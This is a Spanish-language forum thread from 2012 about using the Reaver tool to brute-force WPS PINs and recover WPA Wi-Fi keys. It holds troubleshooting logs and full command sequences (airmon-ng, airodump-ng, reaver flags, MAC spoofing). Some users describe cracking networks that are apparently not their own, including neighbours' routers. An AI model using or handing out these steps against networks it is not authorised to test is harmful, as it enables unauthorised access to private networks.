Tema destacado: [Overclocking] Récords de overclock del foro
 Autor
|
Tema: REAVER: Vulnerabilidad de WPA por WPS habilitado (Leído 35,415 veces)
|
ragtap
 Desconectado
Mensajes: 85
|
Buenas: @ragtap y se_aviles: ¿Qué versión de reaver estais usando? @heaviloto: A ver si quedamos con zydas  Un saludete ChimoC Estoy utilizando la version 1.4 que viene por defecto en la WW 3.4 Añado que intentando otra red obtendo es siguiente error: - Trying pin 33365671
- Sending EAPOL START request
[!] WARNING: Receive timeout occurred
- Sending EAPOL START request
[!] WARNING: Receive timeout occurred
- Sending EAPOL START request
- Sending identity response
- Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
- Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
- Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
|
|
|
|
|
En línea
|
|
|
|
E3
Desconectado
Mensajes: 6
|
Ami me funciona bien dos onoYYXX WPA/WPA2 wps habilitados por los aires, uno en 7h y el otro en 15h.... Reaver recomendado lentito pero con esta seguridad de lo mejor que hay ahora. Las dos keys 10 numeros de 0-9. Para sacar esta key con dicc vamos listos 30 años
|
|
|
|
|
En línea
|
|
|
|
ragtap
Desconectado
Mensajes: 85
|
E3, Que tarjeta tienes?
|
|
|
|
|
En línea
|
|
|
|
E3
Desconectado
Mensajes: 6
|
Realtek 8187 la alfa tipica
|
|
|
|
|
En línea
|
|
|
|
Lenna
Desconectado
Mensajes: 1
|
Hola, Soy nueva en el foro y primeramente daros la enhorabuena por la web. Quería comentaros que he estado probando el reaver con mi propia red, la cuál tenía el WPS activado, y no hubo problemas en sacar el pass. Como dato deciros que tardó 7:15 h. Por supuesto ya desactivé el WPS =) El problema es cuando voy a probar con otra red a ver qué ocurre. Compruebo que tiene WPS, que está activado también, y procedo con el reaver. Os paso el log: - Waiting for beacon from XX:XX:XX:XX:XX:XX
- Switching mon0 to channel 9
- Switching mon0 to channel 1
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
- Associated with 74:44:01:60:C5:BA (ESSID: ONOXXX)
- Trying pin 12345670
- Sending EAPOL START request
[!] WARNING: Receive timeout occurred
- Sending EAPOL START request
[!] WARNING: Receive timeout occurred
- Sending EAPOL START request
(...) - Received identity request
- Sending identity response
[!] WARNING: Receive timeout occurred
- Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
- Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
- Switching mon0 to channel 2
- Switching mon0 to channel 3
Como véis, los canales se van alternando. Así que tanto si pruebo a meterle un canal: # reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c X como si pruebo a fijarla: # reaver -i mon0 -b XX:XX:XX:XX:XX:XX --fixed el mensaje es, para ambos, el siguiente: - Waiting for beacon from XX:XX:XX:XX:XX:XX
- Associated with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: ONOXXX)
(...)
Si a alguien supiese a que se debe este fallo en la asociación, agredecería que me diesen respuestas.
Un saludo.
|
|
|
|
« Última modificación: 7 Febrero 2012, 00:24 por Lenna »
|
En línea
|
|
|
|
P4nd3m0n1um
Desconectado
Mensajes: 619
|
buenas, les dejo para los que tengan ubuntu o debian que trabajan con archivos .deb, los deb de Reaver v1.4: --> Reaver-1.4.deb |
|
|
|
|
En línea
|
|
|
|
|
DonVidela
|
Yo he tenido varias dudas respecto a esto y jamás lo he hecho, pero ahora que esta mas "producida" la cosa, tengo las siguientes consultas:
Estas vulnerabilidades depende del router, o de la compañia de ISP ? es valido para todos los paises? porque jamas he visto esas redes aca en Chile, me gustaría que me aclararan eso, gracias.
|
|
|
|
|
En línea
|
Aprendiendo: Java , C# , pl/sql, mysql , sql server, PHP , Access, JSF, Facelets, JSP, CakePHP, JQuery http://pablovidela.wordpress.com |
|
|
|
|
raimangsxr
Desconectado
Mensajes: 126
|
Me pasa exactamente como a Lenna, obtengo:
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXXXX)
Y no hay manera.
Utilizo awus036h/rtl8187L y la señal es de -30 en el airodump-ng supongo que es más que suficiente.
¿Alguna idea de porque no se asocia?
|
|
|
|
|
En línea
|
|
|
|
raimangsxr
Desconectado
Mensajes: 126
|
Solucionado el problema de asociación que tenía. Simplemente me descargado la ultima versión del repositorio de svn de reaver en mi ubuntu 11.04 Esto es una dependencia necesaria: sudo apt-get install libsqlite3-dev Descargamos la ultima versión de reaver: svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver Lo instalamos => ./configure, make install y make Lo utilizamos => ./reaver -i mon0 -b bssid -vv Y ha fucionado sin problemas. Esos son los pasos que yo he seguido. NOTA: en algun paso si os falla utilizad "sudo" para ejecutalo. No recuerdo cual era pero creo que make install fallaba y era necesario ejecutarlo como sudo make install. Un saludo. |
|
|
|
|
En línea
|
|
|
|
Danistov
Desconectado
Mensajes: 10
|
tengo el tipico comtrend de telefonica (64:68:0c...)y hay un boton pequeño delante que pone wps, pero no se si eso significa que me pueden piratear pq no se si esta "activo" no he entendido muy bien para que sirve, ¿para permitir la entrada a un dispostivo se supone que hay que darle al botoncito? ahora mismo estoy usando mi wifi sin tener que darle al boton ni asociarlo con ningun pin, pongo una captura de mi router http://www.subirimagenes.com/otros-comtrend-7424064.htmlcomo vereis tengo checkeado dnd pone pin, pero lo tengo vacio, eso significa que si pongo un numero cuando me conecte tendre que escribirlo tambien desde mi gestor de conexion? me pueden piratear? a ver si alguien me orienta un poco, que estoy liao xDD saludos |
|
|
|
« Última modificación: 11 Febrero 2012, 02:17 por Danistov »
|
En línea
|
|
|
|
Danistov
Desconectado
Mensajes: 10
|
No seria mas correcto decir que:
1.- Walsh --> Lo que hace es detectar que Aps que tienen WPS(no todos, aun) pero eso no quiere decir que sean vulnerables o que el WPS este ON cuando podria estar OFF.
Es correcta mi afirmacion?
yo pregunto lo mismo, con walsh te detectan todaslas ap con wps activado o puede que este desactivado?? hay que hacer lo de la captura del wireshark a la fuerza?
|
|
|
|
|
En línea
|
|
|
|
Danistov
Desconectado
Mensajes: 10
|
tengo el tipico comtrend de telefonica (64:68:0c...)y hay un boton pequeño delante que pone wps, pero no se si eso significa que me pueden piratear pq no se si esta "activo" no he entendido muy bien para que sirve, ¿para permitir la entrada a un dispostivo se supone que hay que darle al botoncito? ahora mismo estoy usando mi wifi sin tener que darle al boton ni asociarlo con ningun pin, pongo una captura de mi router http://www.subirimagenes.com/otros-comtrend-7424064.htmlcomo vereis tengo checkeado dnd pone pin, pero lo tengo vacio, eso significa que si pongo un numero cuando me conecte tendre que escribirlo tambien desde mi gestor de conexion? me pueden piratear? a ver si alguien me orienta un poco, que estoy liao xDD saludos bueno, estoy haciendo pruebas a estas horas desde wifiway, asi que me edito yo para ir avanzando un poco he hecho un walsh -i mon0 y me ha aparecido mi router comtrend y dos vecinos con orange-xxxx he hecho un reaver-i mon0 -b mac_ap -vv a mi router y me salia esto eaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner < cheffner@tacnetsol.com> - Switching mon0 to channel 3
- Waiting for beacon from 64:68:0C:....
- Associated with 64:68:0C:XX:XX:XX (ESSID: dani_wifi)
- Trying pin 12345670
- Sending EAPOL START request
- Received identity request
- Sending identity response
pero se quedaba parado todo el tiempo, luego le he dado a WSC disable dentro de mi router (os puse imagen anets) y luego escaneando con walsh efectivamente ha dejado de salir al parecer en este router no hay un pin por defecto sino que tienes que meterlo tu a mano al mismo tiempo tanto en el router como en el programita que uses para conectarte (digo yo, si digo alguna tonteria decidmelo) bueno, el caso es que he probado por casualidad a las otras dos redes, las de mis vecinos, y si que funciona reaver y se queda probando contraseñas, aunque al rato solo sale esto Received identity request - Sending identity response
- Received identity request
- Sending identity response
- Received identity request
- Sending identity response............
Tranquilos ya lo he parado, solo queria probarlo bueno esta es mi pequeña experiencia, si alguien me puede explicar un poco mas lo de como funciona esto del pin en mi router que me lo diga por favor saludos
|
|
|
|
« Última modificación: 11 Febrero 2012, 03:14 por Danistov »
|
En línea
|
|
|
|
HCK.
Desconectado
Mensajes: 48
|
Ums, es interesante la aplicación. Pero tengo unas dudas, ¿para asociarse al AP con WPS no se necesita pulsar un botón de asociación que contiene el router?. Lo digo porque poseo un Livebox 2 y ese router trae el WPS activado por defecto (historia que desactive desde el primer dia porque yo veia que con la clave que te dá, 8 digitos sin alternacion de ningun otro caracter, algo se podria hacer..)  Tambien añado, que el RT3070 tambien es compatible en la ultima versión. Lo he leido en seguridadwireless. Pronto os digo que tal rula cuando lo pruebe con ese chip  . Me habia asustado al leerlo, a lo primero, que mi cacharro de 1W no sirviera. Pero bueno, yo plenamente os confirmo. Lo probare tambien con un AR9271 que tengo suelto por casa. Y os dejo datos . Bueno, un saludo chicos. |
|
|
|
« Última modificación: 11 Febrero 2012, 15:06 por HCK. »
|
En línea
|
|
|
|
namco04
Desconectado
Mensajes: 13
|
Os cuento mi experiencia con reaver 1.4 que incluye el WW 3.4, tenia 2 tarjetas wifi antiguas una rt73usb y otra ath5k, con las dos me daba mas errores que ni se, saltaba un pin y me salia una parrafada error 2x15, no hay nose que, y por supuesto el 0x02 y 0x03 de wps failure,
compre ayer un usb wifi con boton wps y todo, no es que haga nada pero la mayoria de los fallos ya no me les saca, solo el de 0x02 y 0x03 que he mirao por todo internet y ademas de comandos con --no-nacks y -d 15 pero en esta ocasion siguen saliendo los errores,
asi que llevo 20 horas con algo mas del 20% y me voy a morir del asco esperando,
igual alguien me puede ayudar a agilizarlo,
comandos
1.macchanger -m 00:11:22:33:44:55 wlan0
2.airmon-ng start wlan0
3.airodump-ng mon0
4.reaver -i mon0 -b macap -N(nonacks) -d(he probado varias cantidades) -c canal -vv
en el -d cambiando en alguna va mas rapido y se me desconecta menos,
yo veo que a algunos os va mas rapido y no os sale tantas cosas
a mi me pone trying pin xxxxxxxxx
luego sending y reciving, luego los m1 y si va bien el nack wps, pero casi nunca lo hace todo seguido, de vez en cuando se desconecta y pone lo de WARNING, no associate o el error 0x02 y ala a repetir 4 veces o mas,
teneis algun consejo, el router es un netgear de ono A0:21:7b:xx:xx:xx y mi tarjeta una rt2800 o 3070,
gracias un saludo, por la anti eterna espera, y q no se me salten los plomos q lo fliparia, aunque de vez en cuando lo guardo pero prefiero no probar
|
|
|
|
|
En línea
|
|
|
|
|
 |
